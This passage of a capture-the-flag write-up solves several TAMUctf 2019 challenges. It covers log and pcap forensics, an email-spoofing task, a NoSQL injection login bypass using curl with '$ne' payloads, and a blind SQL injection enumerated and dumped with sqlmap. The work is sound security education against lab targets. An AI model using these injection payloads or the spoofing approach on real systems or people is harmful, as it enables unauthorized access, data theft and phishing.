10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.web.html HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.web.php HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /0.html HTTP/1.1" 404 441 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /0.php HTTP/1.1" 404 440 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

So 10.187.195.95 is the answer of the first part.

Open ports#

We need to find frame where the server answered with with TCP SYN/ACK:

1
2
$ tshark -r capture.pcap -Y 'ip.dst == 10.187.195.95 && tcp.flags.ack == 1 && tcp.flags.syn == 1' -T fields -e tcp.srcport | uniq | sort | tr "\n" ','
22,22,22,80,80

So the answer is 22,80

Name of web files#

Let's read logs/apache2/access.log again and filter 10.187.195.95 then extract the request URI path, keep only unique values, sort them and format them:

1
2
$ cat logs/apache2/access.log | grep '10.187.195.95' | grep ' 200 ' | grep -o -E 'GET /([a-zA-Z0-9.]+)(?:?| )' | grep -oP '(?<=/)[\w.]+' | uniq | sort | tr "\n" ','
about.html,adminlogin.html,adminlogin.php,contact.html,gallery.html,index.html,services.html,typo.html,

Now we can take a look at the pcap using Wireshark/Tshark filter power (https://www.wireshark.org/docs/dfref/h/http.html) to see if we can find more pages.

First we will only frame where the destination IP address is 10.187.195.95 and where the HTTP code response is 200 (page found) and then extract the frame number of the request associated to that response.

With those request frame numbers we can build a second query to extract the request URI path:

1
2
3
4
5
$ tshark -r capture.pcap -Y 'ip.dst == 10.187.195.95 && http.response.code == 200' -T fields -e http.request_in | tr "\n" ' '
15253 16315 16410 106175 107508 107510 122987 137513 143203 173112 185377 290854 290867 290880 290891 290898 290906 290918 290925 290933 290943 290953 290968 290975 290983 290993 291003 291013 291025 291033 291043 291055 291063 291073 291083 291098 291105 291113 291123 291133 291146 291160 291373 291453 291750 292207 292498 292641 292766 292906 293280 293678 293767 293777 293789 293799 293807 293817 293827 293839 293847 293857 293867 293877 293889 293897 293907 293917 293930 293939 293947 293957 293967 293980 293989 293997 294007 294017 294032 294039 294047 294057 294067 294077 294089 294097 294107 294117 294127 294140 294149 294157 294167 294177 294187 294199 294207 294217 294227 294242 294249 294257 294267 294277 294292 294299 294307 294317 294327 294337 294352 294359 294367 294377 294387 294399 294407 294425 294433 294442 294449 294457 294469 294477 332626 332642 332652 332659 332669 332679 332686 332699 332706 332714 332724 332734 332744 332757 332766 332774 332784 332794 332809 332816 332824 332834 332847 332856 332864 332874 332884 332894 332906 332914 332924 332939 332946 332954 332964 332974 332986 332994 333004 333014 333024 333036 333044 333054 333064 333074 333086 333094 333104 333114 333124 333139 333146 333154 333164 333178 333186 333194 333204 333214 333224 333236 333244 333254 333264 333274 333286 333294 333304 333314 333329 333336 333344 333354 333364 333374 333386 333394 333404 333414 333424 333439 333446 333454 333464 333474 333486 333494 333504 333514 333529 333536 333544 333554 333564 333574 333589 333596 333604 333614 333624 333634 333646 333656 333667 333676 333684 333696 333704 333719 333726 333734 333744 333756 333764 333774 333786 333794 333804 333816 333824 333834 333847 333856 333864 333879 333886 333899 333906 333914 333926

$ tshark -r capture.pcap -Y 'frame.number == 15253 || frame.number == 16315 || frame.number == 16410 || frame.number == 106175 || frame.number == 107508 || frame.number == 107510 || frame.number == 122987 || frame.number == 137513 || frame.number == 143203 || frame.number == 173112 || frame.number == 185377 || frame.number == 290854 || frame.number == 290867 || frame.number == 290880 || frame.number == 290891 || frame.number == 290898 || frame.number == 290906 || frame.number == 290918 || frame.number == 290925 || frame.number == 290933 || frame.number == 290943 || frame.number == 290953 || frame.number == 290968 || frame.number == 290975 || frame.number == 290983 || frame.number == 290993 || frame.number == 291003 || frame.number == 291013 || frame.number == 291025 || frame.number == 291033 || frame.number == 291043 || frame.number == 291055 || frame.number == 291063 || frame.number == 291073 || frame.number == 291083 || frame.number == 291098 || frame.number == 291105 || frame.number == 291113 || frame.number == 291123 || frame.number == 291133 || frame.number == 291146 || frame.number == 291160 || frame.number == 291373 || frame.number == 291453 || frame.number == 291750 || frame.number == 292207 || frame.number == 292498 || frame.number == 292641 || frame.number == 292766 || frame.number == 292906 || frame.number == 293280 || frame.number == 293678 || frame.number == 293767 || frame.number == 293777 || frame.number == 293789 || frame.number == 293799 || frame.number == 293807 || frame.number == 293817 || frame.number == 293827 || frame.number == 293839 || frame.number == 293847 || frame.number == 293857 || frame.number == 293867 || frame.number == 293877 || frame.number == 293889 || frame.number == 293897 || frame.number == 293907 || frame.number == 293917 || frame.number == 293930 || frame.number == 293939 || frame.number == 293947 || frame.number == 293957 || frame.number == 293967 || frame.number == 293980 || frame.number == 293989 || frame.number == 293997 || frame.number == 294007 || frame.number == 294017 || frame.number == 294032 || frame.number == 294039 || frame.number == 294047 || frame.number == 294057 || frame.number == 294067 || frame.number == 294077 || frame.number == 294089 || frame.number == 294097 || frame.number == 294107 || frame.number == 294117 || frame.number == 294127 || frame.number == 294140 || frame.number == 294149 || frame.number == 294157 || frame.number == 294167 || frame.number == 294177 || frame.number == 294187 || frame.number == 294199 || frame.number == 294207 || frame.number == 294217 || frame.number == 294227 || frame.number == 294242 || frame.number == 294249 || frame.number == 294257 || frame.number == 294267 || frame.number == 294277 || frame.number == 294292 || frame.number == 294299 || frame.number == 294307 || frame.number == 294317 || frame.number == 294327 || frame.number == 294337 || frame.number == 294352 || frame.number == 294359 || frame.number == 294367 || frame.number == 294377 || frame.number == 294387 || frame.number == 294399 || frame.number == 294407 || frame.number == 294425 || frame.number == 294433 || frame.number == 294442 || frame.number == 294449 || frame.number == 294457 || frame.number == 294469 || frame.number == 294477 || frame.number == 332626 || frame.number == 332642 || frame.number == 332652 || frame.number == 332659 || frame.number == 332669 || frame.number == 332679 || frame.number == 332686 || frame.number == 332699 || frame.number == 332706 || frame.number == 332714 || frame.number == 332724 || frame.number == 332734 || frame.number == 332744 || frame.number == 332757 || frame.number == 332766 || frame.number == 332774 || frame.number == 332784 || frame.number == 332794 || frame.number == 332809 || frame.number == 332816 || frame.number == 332824 || frame.number == 332834 || frame.number == 332847 || frame.number == 332856 || frame.number == 332864 || frame.number == 332874 || frame.number == 332884 || frame.number == 332894 || frame.number == 332906 || frame.number == 332914 || frame.number == 332924 || frame.number == 332939 || frame.number == 332946 || frame.number == 332954 || frame.number == 332964 || frame.number == 332974 || frame.number == 332986 || frame.number == 332994 || frame.number == 333004 || frame.number == 333014 || frame.number == 333024 || frame.number == 333036 || frame.number == 333044 || frame.number == 333054 || frame.number == 333064 || frame.number == 333074 || frame.number == 333086 || frame.number == 333094 || frame.number == 333104 || frame.number == 333114 || frame.number == 333124 || frame.number == 333139 || frame.number == 333146 || frame.number == 333154 || frame.number == 333164 || frame.number == 333178 || frame.number == 333186 || frame.number == 333194 || frame.number == 333204 || frame.number == 333214 || frame.number == 333224 || frame.number == 333236 || frame.number == 333244 || frame.number == 333254 || frame.number == 333264 || frame.number == 333274 || frame.number == 333286 || frame.number == 333294 || frame.number == 333304 || frame.number == 333314 || frame.number == 333329 || frame.number == 333336 || frame.number == 333344 || frame.number == 333354 || frame.number == 333364 || frame.number == 333374 || frame.number == 333386 || frame.number == 333394 || frame.number == 333404 || frame.number == 333414 || frame.number == 333424 || frame.number == 333439 || frame.number == 333446 || frame.number == 333454 || frame.number == 333464 || frame.number == 333474 || frame.number == 333486 || frame.number == 333494 || frame.number == 333504 || frame.number == 333514 || frame.number == 333529 || frame.number == 333536 || frame.number == 333544 || frame.number == 333554 || frame.number == 333564 || frame.number == 333574 || frame.number == 333589 || frame.number == 333596 || frame.number == 333604 || frame.number == 333614 || frame.number == 333624 || frame.number == 333634 || frame.number == 333646 || frame.number == 333656 || frame.number == 333667 || frame.number == 333676 || frame.number == 333684 || frame.number == 333696 || frame.number == 333704 || frame.number == 333719 || frame.number == 333726 || frame.number == 333734 || frame.number == 333744 || frame.number == 333756 || frame.number == 333764 || frame.number == 333774 || frame.number == 333786 || frame.number == 333794 || frame.number == 333804 || frame.number == 333816 || frame.number == 333824 || frame.number == 333834 || frame.number == 333847 || frame.number == 333856 || frame.number == 333864 || frame.number == 333879 || frame.number == 333886 || frame.number == 333899 || frame.number == 333906 || frame.number == 333914 || frame.number == 333926' -T fields -e http.request.uri.path | uniq | sort | tr "\n" ','
,/adminlogin.php,

But we already found adminlogin.php from logs/apache2/access.log so we didn't get any additional unique values.

So the answer is about.html,adminlogin.html,adminlogin.php,contact.html,gallery.html,index.html,services.html,typo.html.

Easy - Onboarding Checklist - Misc#

From: importantperson@somebigcorp.com Date: Feb 22, 2019 9:00 AM To: someguy@somebigcorp.com Subject: New Employee Access

Hello Some Guy,

We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee's email address to tamuctf@gmail.com so they can process the account request?

Thank you, Important Person

The new employee can be a little slow to respond.

Pick a random email spoofer and send

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
From: Some Guy <someguy@somebigcorp.com>
To: <tamuctf@gmail.com>
Subject: New Employee Access

Content:

Hello Tamuctf,

Can you create an account to noraj (he is the new employee) for the security appliances.

Its email address is <your email here>.

Regards,

Some Guy

You will receive Hello new employee! Some Guy sent me your email. Here is your key gigem{wuT_4n_31337_sp0ofer_494C4F5645594F55}.

Medium - Login App - Web#

http://web4.tamuctf.com

At the bottom of the page we can see:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<script>
    $("#submit").on('click', function(){
        $.ajax({
            url: 'login',
            type : "POST",
            dataType : 'json',
            data : JSON.stringify({"username": $("#username").val(), "password": $("#password").val()}),
            contentType: 'application/json;charset=UTF-8',
            success : function(result) {
                $(".result").html(result);
                console.log(result);
                alert(result);
            },
            error: function(xhr, resp, text) {
                $(".result").html("Something went wrong");
                console.log(xhr, resp, text);
            }
        })
    });
</script>

We can try to log in with curl:

1
curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":"xyz","password":"xyz"}' http://web4.tamuctf.com/login

Maybe it is a NoSQL injection as it is using some JSON data. Let's check PayloadsAllTheThings.

We will try to find a user, once we found bob try to avoid it then it will login with the admin account:

1
2
3
4
5
curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"nosql"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login
"Welcome: bob!"

curl -H 'Content-Type: application/json; charset=UTF-8' -X POST --data '{"username":{"$ne":"bob"},"password":{"$ne":"injection"}}' http://web4.tamuctf.com/login
"Welcome: admin!\ngigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea}"

Hard - Bird Box Challenge - Web#

http://web2.tamuctf.com

We've got Aggies, Trucks, and Eggs!

There is only one Search parameter and no LDAP injection, so let's try SQL injection.

By manual assessment we found a boolean-based blind SQLi so now we can use SQLmap to gather more information.

Enumerate DBMS banner:

1
2
3
4
5
6
7
8
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --banner --technique=BT
...
[22:25:04] [INFO] retrieved: 5.7.25-0ubuntu0.18.04.2
web application technology: Nginx 1.15.8
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.0
banner:    '5.7.25-0ubuntu0.18.04.2'
...

Enumerate DBMS databases:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --dbs --threads=10
...
[22:27:28] [INFO] fetching database names
[22:27:28] [INFO] fetching number of databases
[22:27:28] [INFO] retrieved: 2
[22:27:59] [INFO] retrieving the length of query output
[22:27:59] [INFO] retrieved: 18
[22:28:06] [INFO] retrieved: information_schema
[22:28:06] [INFO] retrieving the length of query output
[22:28:06] [INFO] retrieved: 6
[22:28:10] [INFO] retrieved: SqliDB
available databases [2]:
[*] information_schema
[*] SqliDB
...

Enumerate SqliDB database tables:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --threads=10 --tables -D SqliDB
...
[22:30:26] [INFO] fetching tables for database: 'SqliDB'
[22:30:26] [INFO] fetching number of tables for database 'SqliDB'
[22:30:26] [INFO] resumed: 1
[22:30:26] [INFO] retrieving the length of query output
[22:30:26] [INFO] resumed: 6
[22:30:26] [INFO] resumed: Search
Database: SqliDB
[1 table]
+--------+
| Search |
+--------+
...

Enumerate SqliDB database Search table columns:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --threads=10 --columns -D SqliDB -T Search
...
[22:31:26] [INFO] fetching columns for table 'Search' in database 'SqliDB'
[22:31:26] [INFO] retrieved: 1
[22:31:27] [INFO] retrieving the length of query output
[22:31:27] [INFO] retrieved: 5
[22:31:31] [INFO] retrieved: items
[22:31:31] [INFO] retrieving the length of query output
[22:31:31] [INFO] retrieved: 12
[22:31:37] [INFO] retrieved: varchar(100)
Database: SqliDB
Table: Search
[1 column]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| items  | varchar(100) |
+--------+--------------+
...

Let's count the number of entries:

1
2
3
4
5
6
7
8
9
10
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --threads=10 --count -D SqliDB -T Search
...
[22:33:01] [INFO] retrieved: 3
Database: SqliDB
+--------+---------+
| Table  | Entries |
+--------+---------+
| Search | 3       |
+--------+---------+
...

Only 3, it must be the 3 entries in the description.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --threads=10 --dump -D SqliDB -T Search -C items
...
[22:33:59] [INFO] fetching entries of column(s) 'items' for table 'Search' in database 'SqliDB'
[22:33:59] [INFO] fetching number of column(s) 'items' entries for table 'Search' in database 'SqliDB'
[22:33:59] [INFO] resumed: 3
[22:33:59] [INFO] retrieving the length of query output
[22:33:59] [INFO] retrieved: 6
[22:34:04] [INFO] retrieved: Aggies
[22:34:04] [INFO] retrieving the length of query output
[22:34:04] [INFO] retrieved: 4
[22:34:07] [INFO] retrieved: Eggs
[22:34:07] [INFO] retrieving the length of query output
[22:34:07] [INFO] retrieved: 6
[22:34:11] [INFO] retrieved: Trucks
Database: SqliDB
Table: Search
[3 entries]
+--------+
| items  |
+--------+
| Aggies |
| Eggs   |
| Trucks |
+--------+
...

Good guess, so the flag is not in the database data. Maybe in DBMS users or passwords:

1
2
3
4
5
6
7
8
9
$ sqlmap -u 'http://web2.tamuctf.com/Search.php?Search=eggs' --random-agent -p Search --dbms=mysql --technique=BT --threads=10 --users
[22:35:36] [INFO] fetching database users
[22:35:36] [INFO] fetching number of database users
[22:35:36] [INFO] retrieved: 1
[22:35:37] [INFO] retrieving the length of query output
[22:35:37] [INFO] retrieved: 38
[22:35:48] [INFO] retrieved: 'gigem{w3_4r3_th3_4ggi3s}'@'localhost'
database management system users [1]:
[*] 'gigem{w3_4r3_th3_4ggi3s}'@'localhost'
Share